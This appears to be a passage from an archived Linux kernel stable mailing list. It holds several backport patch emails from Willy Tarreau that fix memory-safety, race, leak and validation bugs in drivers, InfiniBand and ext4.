char __user *end = uaddr + size - 1;

if (unlikely(size == 0))
- return ret;
+ return 0;

+ if (unlikely(uaddr > end))
+ return -EFAULT;
/*
* Writing zeroes into userspace here is OK, because we know that if
* the zero gets there, we'll be overwriting it.
*/
- while (uaddr <= end) {
- ret = __put_user(0, uaddr);
- if (ret != 0)
- return ret;
+ do {
+ if (unlikely(__put_user(0, uaddr) != 0))
+ return -EFAULT;
uaddr += PAGE_SIZE;
- }
+ } while (uaddr <= end);

/* Check whether the range spilled into the next page. */
if (((unsigned long)uaddr & PAGE_MASK) ==
((unsigned long)end & PAGE_MASK))
- ret = __put_user(0, end);
+ return __put_user(0, end);

- return ret;
+ return 0;
}

static inline int fault_in_multipages_readable(const char __user *uaddr,
int size)
{
volatile char c;
- int ret = 0;
const char __user *end = uaddr + size - 1;

if (unlikely(size == 0))
- return ret;
+ return 0;

- while (uaddr <= end) {
- ret = __get_user(c, uaddr);
- if (ret != 0)
- return ret;
+ if (unlikely(uaddr > end))
+ return -EFAULT;
+
+ do {
+ if (unlikely(__get_user(c, uaddr) != 0))
+ return -EFAULT;
uaddr += PAGE_SIZE;
- }
+ } while (uaddr <= end);

/* Check whether the range spilled into the next page. */
if (((unsigned long)uaddr & PAGE_MASK) ==
((unsigned long)end & PAGE_MASK)) {
- ret = __get_user(c, end);
- (void)c;
+ return __get_user(c, end);
}

- return ret;
+ return 0;
}

int add_to_page_cache_locked(struct page *page, struct address_space *mapping,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Long Li <lon...@microsoft.com>

commit 407a3aee6ee2d2cb46d9ba3fc380bc29f35d020c upstream.

The host keeps sending heartbeat packets independent of the
guest responding to them. Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there maybe multiple heartbeat
messages pending that have not been responded to. For instance this occurs when the
VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that maybe pending.

Signed-off-by: Long Li <lon...@microsoft.com>
Signed-off-by: K. Y. Srinivasan <k...@microsoft.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/hv/hv_util.c | 10 +++++++---
1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/drivers/hv/hv_util.c b/drivers/hv/hv_util.c
index 64c778f..5f69c83 100644
--- a/drivers/hv/hv_util.c
+++ b/drivers/hv/hv_util.c
@@ -244,10 +244,14 @@ static void heartbeat_onchannelcallback(void *context)
struct heartbeat_msg_data *heartbeat_msg;
u8 *hbeat_txf_buf = util_heartbeat.recv_buffer;

- vmbus_recvpacket(channel, hbeat_txf_buf,
- PAGE_SIZE, &recvlen, &requestid);
+ while (1) {
+
+ vmbus_recvpacket(channel, hbeat_txf_buf,
+ PAGE_SIZE, &recvlen, &requestid);
+
+ if (!recvlen)
+ break;

- if (recvlen > 0) {
icmsghdrp = (struct icmsg_hdr *)&hbeat_txf_buf[
sizeof(struct vmbuspipe_hdr)];

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Erez Shitrit <ere...@mellanox.com>

commit 68c6bcdd8bd00394c234b915ab9b97c74104130c upstream.

The function send_leave sets the member: group->query_id
(group->query_id = ret) after calling the sa_query, but leave_handler
can be executed before the setting and it might delete the group object,
and will get a memory corruption.

Additionally, this patch gets rid of group->query_id variable which is
not used.

Fixes: faec2f7b96b5 ('IB/sa: Track multicast join/leave requests')
Signed-off-by: Erez Shitrit <ere...@mellanox.com>
Signed-off-by: Leon Romanovsky <le...@kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/core/multicast.c | 13 ++-----------
1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/drivers/infiniband/core/multicast.c b/drivers/infiniband/core/multicast.c
index d2360a8..180d7f4 100644
--- a/drivers/infiniband/core/multicast.c
+++ b/drivers/infiniband/core/multicast.c
@@ -106,7 +106,6 @@ struct mcast_group {
atomic_t refcount;
enum mcast_group_state state;
struct ib_sa_query *query;
- int query_id;
u16 pkey_index;
u8 leave_state;
int retries;
@@ -339,11 +338,7 @@ static int send_join(struct mcast_group *group, struct mcast_member *member)
member->multicast.comp_mask,
3000, GFP_KERNEL, join_handler, group,
&group->query);
- if (ret >= 0) {
- group->query_id = ret;
- ret = 0;
- }
- return ret;
+ return (ret > 0) ? 0 : ret;
}

static int send_leave(struct mcast_group *group, u8 leave_state)
@@ -363,11 +358,7 @@ static int send_leave(struct mcast_group *group, u8 leave_state)
IB_SA_MCMEMBER_REC_JOIN_STATE,
3000, GFP_KERNEL, leave_handler,
group, &group->query);
- if (ret >= 0) {
- group->query_id = ret;
- ret = 0;
- }
- return ret;
+ return (ret > 0) ? 0 : ret;
}

static void join_group(struct mcast_group *group, struct mcast_member *member,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Alexey Khoroshilov <khoro...@ispras.ru>

commit 3b7c7e52efda0d4640060de747768360ba70a7c0 upstream.

There is an allocation with GFP_KERNEL flag in mos7840_write(),
while it may be called from interrupt context.

Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic
allocation in write path")

Found by Linux Driver Verification project (linuxtesting.org).

Signed-off-by: Alexey Khoroshilov <khoro...@ispras.ru>
Signed-off-by: Johan Hovold <jo...@kernel.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/serial/mos7840.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c
index d060130..7df7df6 100644
--- a/drivers/usb/serial/mos7840.c
+++ b/drivers/usb/serial/mos7840.c
@@ -1438,8 +1438,8 @@ static int mos7840_write(struct tty_struct *tty, struct usb_serial_port *port,
}

if (urb->transfer_buffer == NULL) {
- urb->transfer_buffer =
- kmalloc(URB_TRANSFER_BUFFER_SIZE, GFP_KERNEL);
+ urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE,
+ GFP_ATOMIC);

if (urb->transfer_buffer == NULL) {
dev_err_console(port, "%s no more kernel memory...\n",
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:11 PM2/5/17
to
From: Arnd Bergmann <ar...@arndb.de>

commit 34eee70a7b82b09dbda4cb453e0e21d460dae226 upstream.

The ad5933_i2c_read function returns an error code to indicate
whether it could read data or not. However ad5933_work() ignores
this return code and just accesses the data unconditionally,
which gets detected by gcc as a possible bug:

drivers/staging/iio/impedance-analyzer/ad5933.c: In function 'ad5933_work':
drivers/staging/iio/impedance-analyzer/ad5933.c:649:16: warning: 'status' may be used uninitialized in this function [-Wmaybe-uninitialized]

This adds minimal error handling so we only evaluate the
data if it was correctly read.

Link: https://patchwork.kernel.org/patch/8110281/
Signed-off-by: Arnd Bergmann <ar...@arndb.de>
Acked-by: Lars-Peter Clausen <la...@metafoo.de>
Signed-off-by: Jonathan Cameron <ji...@kernel.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/staging/iio/impedance-analyzer/ad5933.c | 17 ++++++++++-------
1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/drivers/staging/iio/impedance-analyzer/ad5933.c b/drivers/staging/iio/impedance-analyzer/ad5933.c
index bc23d66..1ff1735 100644
--- a/drivers/staging/iio/impedance-analyzer/ad5933.c
+++ b/drivers/staging/iio/impedance-analyzer/ad5933.c
@@ -646,6 +646,7 @@ static void ad5933_work(struct work_struct *work)
struct iio_dev *indio_dev = i2c_get_clientdata(st->client);
signed short buf[2];
unsigned char status;
+ int ret;

mutex_lock(&indio_dev->mlock);
if (st->state == AD5933_CTRL_INIT_START_FREQ) {
@@ -653,19 +654,22 @@ static void ad5933_work(struct work_struct *work)
ad5933_cmd(st, AD5933_CTRL_START_SWEEP);
st->state = AD5933_CTRL_START_SWEEP;
schedule_delayed_work(&st->work, st->poll_time_jiffies);
- mutex_unlock(&indio_dev->mlock);
- return;
+ goto out;
}

- ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+ ret = ad5933_i2c_read(st->client, AD5933_REG_STATUS, 1, &status);
+ if (ret)
+ goto out;

if (status & AD5933_STAT_DATA_VALID) {
int scan_count = bitmap_weight(indio_dev->active_scan_mask,
indio_dev->masklength);
- ad5933_i2c_read(st->client,
+ ret = ad5933_i2c_read(st->client,
test_bit(1, indio_dev->active_scan_mask) ?
AD5933_REG_REAL_DATA : AD5933_REG_IMAG_DATA,
scan_count * 2, (u8 *)buf);
+ if (ret)
+ goto out;

if (scan_count == 2) {
buf[0] = be16_to_cpu(buf[0]);
@@ -677,8 +681,7 @@ static void ad5933_work(struct work_struct *work)
} else {
/* no data available - try again later */
schedule_delayed_work(&st->work, st->poll_time_jiffies);
- mutex_unlock(&indio_dev->mlock);
- return;
+ goto out;
}

if (status & AD5933_STAT_SWEEP_DONE) {
@@ -690,7 +693,7 @@ static void ad5933_work(struct work_struct *work)
ad5933_cmd(st, AD5933_CTRL_INC_FREQ);
schedule_delayed_work(&st->work, st->poll_time_jiffies);
}
-
+out:
mutex_unlock(&indio_dev->mlock);
}

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:11 PM2/5/17
to
From: Mark Bloch <ma...@mellanox.com>

commit 9db0ff53cb9b43ed75bacd42a89c1a0ab048b2b0 upstream.

When there is a CM id object that has port assigned to it, it means that
the cm-id asked for the specific port that it should go by it, but if
that port was removed (hot-unplug event) the cm-id was not updated.
In order to fix that the port keeps a list of all the cm-id's that are
planning to go by it, whenever the port is removed it marks all of them
as invalid.

This commit fixes a kernel panic which happens when running traffic between
guests and we force reboot a guest mid traffic, it triggers a kernel panic:

Call Trace:
[<ffffffff815271fa>] ? panic+0xa7/0x16f
[<ffffffff8152b534>] ? oops_end+0xe4/0x100
[<ffffffff8104a00b>] ? no_context+0xfb/0x260
[<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
[<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
[<ffffffff81084240>] ? process_timeout+0x0/0x10
[<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
[<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
[<ffffffff81065df0>] ? default_wake_function+0x0/0x20
[<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
[<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
[<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
[<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
[<ffffffff8152a815>] ? page_fault+0x25/0x30
[<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
[<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
[<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
[<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
[<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
[<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
[<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
[<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
[<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
[<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
[<ffffffff8109aef6>] ? kthread+0x96/0xa0
[<ffffffff8100c20a>] ? child_rip+0xa/0x20
[<ffffffff8109ae60>] ? kthread+0x0/0xa0
[<ffffffff8100c200>] ? child_rip+0x0/0x20

Fixes: a977049dacde ("[PATCH] IB: Add the kernel CM implementation")
Signed-off-by: Mark Bloch <ma...@mellanox.com>
Signed-off-by: Erez Shitrit <ere...@mellanox.com>
Reviewed-by: Maor Gottlieb <ma...@mellanox.com>
Signed-off-by: Leon Romanovsky <le...@kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/core/cm.c | 127 +++++++++++++++++++++++++++++++++++++------
1 file changed, 111 insertions(+), 16 deletions(-)

diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
index c410217..951a4f6 100644
--- a/drivers/infiniband/core/cm.c
+++ b/drivers/infiniband/core/cm.c
@@ -79,6 +79,8 @@ static struct ib_cm {
__be32 random_id_operand;
struct list_head timewait_list;
struct workqueue_struct *wq;
+ /* Sync on cm change port state */
+ spinlock_t state_lock;
} cm;

/* Counter indexes ordered by attribute ID */
@@ -160,6 +162,8 @@ struct cm_port {
struct ib_mad_agent *mad_agent;
struct kobject port_obj;
u8 port_num;
+ struct list_head cm_priv_prim_list;
+ struct list_head cm_priv_altr_list;
struct cm_counter_group counter_group[CM_COUNTER_GROUPS];
};

@@ -237,6 +241,12 @@ struct cm_id_private {
u8 service_timeout;
u8 target_ack_delay;

+ struct list_head prim_list;
+ struct list_head altr_list;
+ /* Indicates that the send port mad is registered and av is set */
+ int prim_send_port_not_ready;
+ int altr_send_port_not_ready;
+
struct list_head work_list;
atomic_t work_count;
};
@@ -255,19 +265,46 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
struct ib_mad_agent *mad_agent;
struct ib_mad_send_buf *m;
struct ib_ah *ah;
+ struct cm_av *av;
+ unsigned long flags, flags2;
+ int ret = 0;

+ /* don't let the port to be released till the agent is down */
+ spin_lock_irqsave(&cm.state_lock, flags2);
+ spin_lock_irqsave(&cm.lock, flags);
+ if (!cm_id_priv->prim_send_port_not_ready)
+ av = &cm_id_priv->av;
+ else if (!cm_id_priv->altr_send_port_not_ready &&
+ (cm_id_priv->alt_av.port))
+ av = &cm_id_priv->alt_av;
+ else {
+ pr_info("%s: not valid CM id\n", __func__);
+ ret = -ENODEV;
+ spin_unlock_irqrestore(&cm.lock, flags);
+ goto out;
+ }
+ spin_unlock_irqrestore(&cm.lock, flags);
+ /* Make sure the port haven't released the mad yet */
mad_agent = cm_id_priv->av.port->mad_agent;
- ah = ib_create_ah(mad_agent->qp->pd, &cm_id_priv->av.ah_attr);
- if (IS_ERR(ah))
- return PTR_ERR(ah);
+ if (!mad_agent) {
+ pr_info("%s: not a valid MAD agent\n", __func__);
+ ret = -ENODEV;
+ goto out;
+ }
+ ah = ib_create_ah(mad_agent->qp->pd, &av->ah_attr);
+ if (IS_ERR(ah)) {
+ ret = PTR_ERR(ah);
+ goto out;
+ }

m = ib_create_send_mad(mad_agent, cm_id_priv->id.remote_cm_qpn,
- cm_id_priv->av.pkey_index,
+ av->pkey_index,
0, IB_MGMT_MAD_HDR, IB_MGMT_MAD_DATA,
GFP_ATOMIC);
if (IS_ERR(m)) {
ib_destroy_ah(ah);
- return PTR_ERR(m);
+ ret = PTR_ERR(m);
+ goto out;
}

/* Timeout set by caller if response is expected. */
@@ -277,7 +314,10 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
atomic_inc(&cm_id_priv->refcount);
m->context[0] = cm_id_priv;
*msg = m;
- return 0;
+
+out:
+ spin_unlock_irqrestore(&cm.state_lock, flags2);
+ return ret;
}

static int cm_alloc_response_msg(struct cm_port *port,
@@ -346,7 +386,8 @@ static void cm_init_av_for_response(struct cm_port *port, struct ib_wc *wc,
grh, &av->ah_attr);
}

-static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
+static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av,
+ struct cm_id_private *cm_id_priv)
{
struct cm_device *cm_dev;
struct cm_port *port = NULL;
@@ -376,7 +417,18 @@ static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
ib_init_ah_from_path(cm_dev->ib_device, port->port_num, path,
&av->ah_attr);
av->timeout = path->packet_life_time + 1;
- return 0;
+
+ spin_lock_irqsave(&cm.lock, flags);
+ if (&cm_id_priv->av == av)
+ list_add_tail(&cm_id_priv->prim_list, &port->cm_priv_prim_list);
+ else if (&cm_id_priv->alt_av == av)
+ list_add_tail(&cm_id_priv->altr_list, &port->cm_priv_altr_list);
+ else
+ ret = -EINVAL;
+
+ spin_unlock_irqrestore(&cm.lock, flags);
+
+ return ret;
}

static int cm_alloc_id(struct cm_id_private *cm_id_priv)
@@ -716,6 +768,8 @@ struct ib_cm_id *ib_create_cm_id(struct ib_device *device,
spin_lock_init(&cm_id_priv->lock);
init_completion(&cm_id_priv->comp);
INIT_LIST_HEAD(&cm_id_priv->work_list);
+ INIT_LIST_HEAD(&cm_id_priv->prim_list);
+ INIT_LIST_HEAD(&cm_id_priv->altr_list);
atomic_set(&cm_id_priv->work_count, -1);
atomic_set(&cm_id_priv->refcount, 1);
return &cm_id_priv->id;
@@ -914,6 +968,15 @@ retest:
break;
}

+ spin_lock_irq(&cm.lock);
+ if (!list_empty(&cm_id_priv->altr_list) &&
+ (!cm_id_priv->altr_send_port_not_ready))
+ list_del(&cm_id_priv->altr_list);
+ if (!list_empty(&cm_id_priv->prim_list) &&
+ (!cm_id_priv->prim_send_port_not_ready))
+ list_del(&cm_id_priv->prim_list);
+ spin_unlock_irq(&cm.lock);
+
cm_free_id(cm_id->local_id);
cm_deref_id(cm_id_priv);
wait_for_completion(&cm_id_priv->comp);
@@ -1137,12 +1200,13 @@ int ib_send_cm_req(struct ib_cm_id *cm_id,
goto out;
}

- ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av);
+ ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av,
+ cm_id_priv);
if (ret)
goto error1;
if (param->alternate_path) {
ret = cm_init_av_by_path(param->alternate_path,
- &cm_id_priv->alt_av);
+ &cm_id_priv->alt_av, cm_id_priv);
if (ret)
goto error1;
}
@@ -1562,7 +1626,8 @@ static int cm_req_handler(struct cm_work *work)

cm_process_routed_req(req_msg, work->mad_recv_wc->wc);
cm_format_paths_from_req(req_msg, &work->path[0], &work->path[1]);
- ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av);
+ ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av,
+ cm_id_priv);
if (ret) {
ib_get_cached_gid(work->port->cm_dev->ib_device,
work->port->port_num, 0, &work->path[0].sgid);
@@ -1572,7 +1637,8 @@ static int cm_req_handler(struct cm_work *work)
goto rejected;
}
if (req_msg->alt_local_lid) {
- ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av);
+ ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av,
+ cm_id_priv);
if (ret) {
ib_send_cm_rej(cm_id, IB_CM_REJ_INVALID_ALT_GID,
&work->path[0].sgid,
@@ -2627,7 +2693,8 @@ int ib_send_cm_lap(struct ib_cm_id *cm_id,
goto out;
}

- ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av);
+ ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av,
+ cm_id_priv);
if (ret)
goto out;
cm_id_priv->alt_av.timeout =
@@ -2739,7 +2806,8 @@ static int cm_lap_handler(struct cm_work *work)
cm_init_av_for_response(work->port, work->mad_recv_wc->wc,
work->mad_recv_wc->recv_buf.grh,
&cm_id_priv->av);
- cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av);
+ cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av,
+ cm_id_priv);
ret = atomic_inc_and_test(&cm_id_priv->work_count);
if (!ret)
list_add_tail(&work->list, &cm_id_priv->work_list);
@@ -2931,7 +2999,7 @@ int ib_send_cm_sidr_req(struct ib_cm_id *cm_id,
return -EINVAL;

cm_id_priv = container_of(cm_id, struct cm_id_private, id);
- ret = cm_init_av_by_path(param->path, &cm_id_priv->av);
+ ret = cm_init_av_by_path(param->path, &cm_id_priv->av, cm_id_priv);
if (ret)
goto out;

@@ -3352,7 +3420,9 @@ out:
static int cm_migrate(struct ib_cm_id *cm_id)
{
struct cm_id_private *cm_id_priv;
+ struct cm_av tmp_av;
unsigned long flags;
+ int tmp_send_port_not_ready;
int ret = 0;

cm_id_priv = container_of(cm_id, struct cm_id_private, id);
@@ -3361,7 +3431,14 @@ static int cm_migrate(struct ib_cm_id *cm_id)
(cm_id->lap_state == IB_CM_LAP_UNINIT ||
cm_id->lap_state == IB_CM_LAP_IDLE)) {
cm_id->lap_state = IB_CM_LAP_IDLE;
+ /* Swap address vector */
+ tmp_av = cm_id_priv->av;
cm_id_priv->av = cm_id_priv->alt_av;
+ cm_id_priv->alt_av = tmp_av;
+ /* Swap port send ready state */
+ tmp_send_port_not_ready = cm_id_priv->prim_send_port_not_ready;
+ cm_id_priv->prim_send_port_not_ready = cm_id_priv->altr_send_port_not_ready;
+ cm_id_priv->altr_send_port_not_ready = tmp_send_port_not_ready;
} else
ret = -EINVAL;
spin_unlock_irqrestore(&cm_id_priv->lock, flags);
@@ -3767,6 +3844,9 @@ static void cm_add_one(struct ib_device *ib_device)
port->cm_dev = cm_dev;
port->port_num = i;

+ INIT_LIST_HEAD(&port->cm_priv_prim_list);
+ INIT_LIST_HEAD(&port->cm_priv_altr_list);
+
ret = cm_create_port_fs(port);
if (ret)
goto error1;
@@ -3813,6 +3893,8 @@ static void cm_remove_one(struct ib_device *ib_device)
{
struct cm_device *cm_dev;
struct cm_port *port;
+ struct cm_id_private *cm_id_priv;
+ struct ib_mad_agent *cur_mad_agent;
struct ib_port_modify port_modify = {
.clr_port_cap_mask = IB_PORT_CM_SUP
};
@@ -3830,10 +3912,22 @@ static void cm_remove_one(struct ib_device *ib_device)
for (i = 1; i <= ib_device->phys_port_cnt; i++) {
port = cm_dev->port[i-1];
ib_modify_port(ib_device, port->port_num, 0, &port_modify);
- ib_unregister_mad_agent(port->mad_agent);
+ /* Mark all the cm_id's as not valid */
+ spin_lock_irq(&cm.lock);
+ list_for_each_entry(cm_id_priv, &port->cm_priv_altr_list, altr_list)
+ cm_id_priv->altr_send_port_not_ready = 1;
+ list_for_each_entry(cm_id_priv, &port->cm_priv_prim_list, prim_list)
+ cm_id_priv->prim_send_port_not_ready = 1;
+ spin_unlock_irq(&cm.lock);
flush_workqueue(cm.wq);
+ spin_lock_irq(&cm.state_lock);
+ cur_mad_agent = port->mad_agent;
+ port->mad_agent = NULL;
+ spin_unlock_irq(&cm.state_lock);
+ ib_unregister_mad_agent(cur_mad_agent);
cm_remove_port_fs(port);
}
+
device_unregister(cm_dev->device);
kfree(cm_dev);
}
@@ -3846,6 +3940,7 @@ static int __init ib_cm_init(void)
INIT_LIST_HEAD(&cm.device_list);
rwlock_init(&cm.device_lock);
spin_lock_init(&cm.lock);
+ spin_lock_init(&cm.state_lock);
cm.listen_service_table = RB_ROOT;
cm.listen_service_id = be64_to_cpu(IB_CM_ASSIGN_SERVICE_ID);
cm.remote_id_table = RB_ROOT;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:11 PM2/5/17
to
From: Tariq Toukan <tar...@mellanox.com>

commit 5b810a242c28e1d8d64d718cebe75b79d86a0b2d upstream.

The real QP is destroyed in case of the ref count reaches zero, but
for XRC target QPs this call was missed and caused to QP leaks.

Let's call to destroy for all flows.

Fixes: 0e0ec7e0638e ('RDMA/core: Export ib_open_qp() to share XRC...')
Signed-off-by: Tariq Toukan <tar...@mellanox.com>
Signed-off-by: Noa Osherovich <no...@mellanox.com>
Signed-off-by: Leon Romanovsky <le...@kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/core/uverbs_main.c | 7 ++-----
1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
index f50623d..37b7207 100644
--- a/drivers/infiniband/core/uverbs_main.c
+++ b/drivers/infiniband/core/uverbs_main.c
@@ -224,12 +224,9 @@ static int ib_uverbs_cleanup_ucontext(struct ib_uverbs_file *file,
container_of(uobj, struct ib_uqp_object, uevent.uobject);

idr_remove_uobj(&ib_uverbs_qp_idr, uobj);
- if (qp != qp->real_qp) {
- ib_close_qp(qp);
- } else {
+ if (qp == qp->real_qp)
ib_uverbs_detach_umcast(qp, uqp);
- ib_destroy_qp(qp);
- }
+ ib_destroy_qp(qp);
ib_uverbs_release_uevent(file, &uqp->uevent);
kfree(uqp);
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:11 PM2/5/17
to
From: Theodore Ts'o <ty...@mit.edu>

commit 8cdf3372fe8368f56315e66bea9f35053c418093 upstream.

If the block size or cluster size is insane, reject the mount. This
is important for security reasons (although we shouldn't be just
depending on this check).

Ref: http://www.securityfocus.com/archive/1/539661
Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1332506
Reported-by: Borislav Petkov <b...@alien8.de>
Reported-by: Nikolay Borisov <ker...@kyup.com>
Signed-off-by: Theodore Ts'o <ty...@mit.edu>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/ext4/ext4.h | 1 +
fs/ext4/super.c | 17 ++++++++++++++++-
2 files changed, 17 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 046e3e9..f9c938e 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -246,6 +246,7 @@ struct ext4_io_submit {
#define EXT4_MAX_BLOCK_SIZE 65536
#define EXT4_MIN_BLOCK_LOG_SIZE 10
#define EXT4_MAX_BLOCK_LOG_SIZE 16
+#define EXT4_MAX_CLUSTER_LOG_SIZE 30
#ifdef __KERNEL__
# define EXT4_BLOCK_SIZE(s) ((s)->s_blocksize)
#else
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6cf69fa..faa1920 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -3537,7 +3537,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
if (blocksize < EXT4_MIN_BLOCK_SIZE ||
blocksize > EXT4_MAX_BLOCK_SIZE) {
ext4_msg(sb, KERN_ERR,
- "Unsupported filesystem blocksize %d", blocksize);
+ "Unsupported filesystem blocksize %d (%d log_block_size)",
+ blocksize, le32_to_cpu(es->s_log_block_size));
+ goto failed_mount;
+ }
+ if (le32_to_cpu(es->s_log_block_size) >
+ (EXT4_MAX_BLOCK_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+ ext4_msg(sb, KERN_ERR,
+ "Invalid log block size: %u",
+ le32_to_cpu(es->s_log_block_size));
goto failed_mount;
}

@@ -3652,6 +3660,13 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
"block size (%d)", clustersize, blocksize);
goto failed_mount;
}
+ if (le32_to_cpu(es->s_log_cluster_size) >
+ (EXT4_MAX_CLUSTER_LOG_SIZE - EXT4_MIN_BLOCK_LOG_SIZE)) {
+ ext4_msg(sb, KERN_ERR,
+ "Invalid log cluster size: %u",
+ le32_to_cpu(es->s_log_cluster_size));
+ goto failed_mount;
+ }
sbi->s_cluster_bits = le32_to_cpu(es->s_log_cluster_size) -
le32_to_cpu(es->s_log_block_size);
sbi->s_clusters_per_group =
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:11 PM2/5/17
to
From: Johan Hovold <jo...@kernel.org>

commit ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream.

Make sure to drop the reference taken by class_find_device() after
opening the RTC device.

Fixes: 77437fd4e61f (pm: boot time suspend selftest)
Signed-off-by: Johan Hovold <jo...@kernel.org>
Signed-off-by: Rafael J. Wysocki <rafael.j...@intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
kernel/power/suspend_test.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/kernel/power/suspend_test.c b/kernel/power/suspend_test.c
index 269b097..743615b 100644
--- a/kernel/power/suspend_test.c
+++ b/kernel/power/suspend_test.c
@@ -169,8 +169,10 @@ static int __init test_suspend(void)

/* RTCs have initialized by now too ... can we use one? */
dev = class_find_device(rtc_class, NULL, NULL, has_wakealarm);
- if (dev)
+ if (dev) {
rtc = rtc_class_open(dev_name(dev));
+ put_device(dev);
+ }
if (!rtc) {
printk(warn_no_rtc);
goto done;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:11 PM2/5/17
to
From: Michel Dänzer <mic...@daenzer.net>

NOTE: This patch only applies to 4.5.y or older kernels. With newer
kernels, this problem cannot happen because the driver now uses
drm_crtc_vblank_on/off instead of drm_vblank_pre/post_modeset[0]. I
consider this patch safer for older kernels than backporting the API
change, because drm_crtc_vblank_on/off had various issues in older
kernels, and I'm not sure all fixes for those have been backported to
all stable branches where this patch could be applied.

---------------------

Fixes the vblank interrupt being disabled when it should be on, which
can cause at least the following symptoms:

* Hangs when running 'xset dpms force off' in a GNOME session with
gnome-shell using DRI2.
* RandR 1.4 slave outputs freezing with garbage displayed using
xf86-video-ati 7.8.0 or newer.

[0] See upstream commit:

commit 777e3cbc791f131806d9bf24b3325637c7fc228d
Author: Daniel Vetter <daniel...@ffwll.ch>
Date: Thu Jan 21 11:08:57 2016 +0100

drm/radeon: Switch to drm_vblank_on/off

Reported-and-Tested-by: Max Staudt <mst...@suse.de>
Reviewed-by: Daniel Vetter <dan...@ffwll.ch>
Reviewed-by: Alex Deucher <alexande...@amd.com>
Signed-off-by: Michel Dänzer <michel....@amd.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
